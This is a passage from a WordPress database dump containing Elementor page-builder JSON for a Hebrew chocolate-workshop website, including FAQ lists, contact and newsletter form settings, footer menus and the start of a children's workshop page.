\\u05d1\\u05d9\\u05d7\\u05d3 \\u05d5\\u05d9\\u05e6\\u05e8\\u05d5 \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e2\\u05d1\\u05d5\\u05e8\\u05dd \\u05dc\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd? \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd? \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1? \\u05e8\\u05e7 \\u05ea\\u05d2\\u05d9\\u05d3\\u05d5 \\u05d5\\u05d4\\u05dd \\u05d9\\u05e7\\u05d1\\u05dc\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d4\\u05de\\u05dc\\u05d0\\u05d4 \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05d4\\u05d9\\u05d9\\u05ea\\u05d4 \\u05dc\\u05d4\\u05dd \\u05d0\\u05d9 \\u05e4\\u05e2\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05d4\\u05dd \\u05d4\\u05e7\\u05d8\\u05e0\\u05d9\\u05dd \\u05dc\\u05d3\\u05d1\\u05e8 \\u05e9\\u05d4\\u05dd \\u05d4\\u05db\\u05d9 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd - \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3!<\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"40986278\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"69a8df27\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6999b663\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3ea5b73c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"17ab813e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"37c615a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7559efb1\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d2\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea (\\u05d1\\u05d8\\u05d7 \\u05ea\\u05e8\\u05e6\\u05d5 \\u05e1\\u05d1\\u05d9\\u05d1\\u05d4 \\u05d8\\u05d1\\u05e2\\u05d9\\u05ea)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05e2\\u05d3 \\u05db4 \\u05e9\\u05e2\\u05d5\\u05ea\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05de\\u05d5\\u05d1\\u05df \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd \\u05d5\\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05e0\\u05e8\\u05d9\\u05dd \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d4\\u05dd \\u05dc\\u05d0 \\u05e8\\u05e7 \\u05d9\\u05d0\\u05db\\u05dc\\u05d5, \\u05d4\\u05dd \\u05d2\\u05dd \\u05d9\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05dc\\u05e2\\u05e6\\u05de\\u05dd \\u05dc\\u05de\\u05d7\\u05e8 \\u05de\\u05d4 \\u05e9\\u05d9\\u05d9\\u05e9\\u05d0\\u05e8\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d9\\u05dc\\u05d3 \\u05d0\\u05d7\\u05d3, \\u05d6\\u05d4 \\u05d1\\u05e1\\u05d3\\u05e8 \\u05d2\\u05de\\u05d5\\u05e8, \\u05db\\u05de\\u05d4 \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5 - \\u05d9\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"694d95f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3e053522\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c10ea65\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"7602a7a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7297bf5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"4541ce0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"7952f0ec\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4df9243\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"2024cfba\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"34b4157f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"42863b35\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"3bedbf86\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7ee51c99\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"414e8603\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6cd310bc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(559,123,'_elementor_version','2.9.8'),(560,128,'_wp_page_template','elementor_canvas'),(561,128,'_elementor_edit_mode','builder'),(562,128,'_elementor_data','[{\"id\":\"73f3a63e\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"63f1f80\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"5713db43\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"57068ba8\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"596a5a76\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"26fa35fd\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4097a5fb\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"144a579e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bd8148d\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"45e6d3a2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"409d660c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"1e9c8239\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62e2de7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/kids-choclate.jpg\",\"id\":125},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b4fe8e6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05db\\u05dc 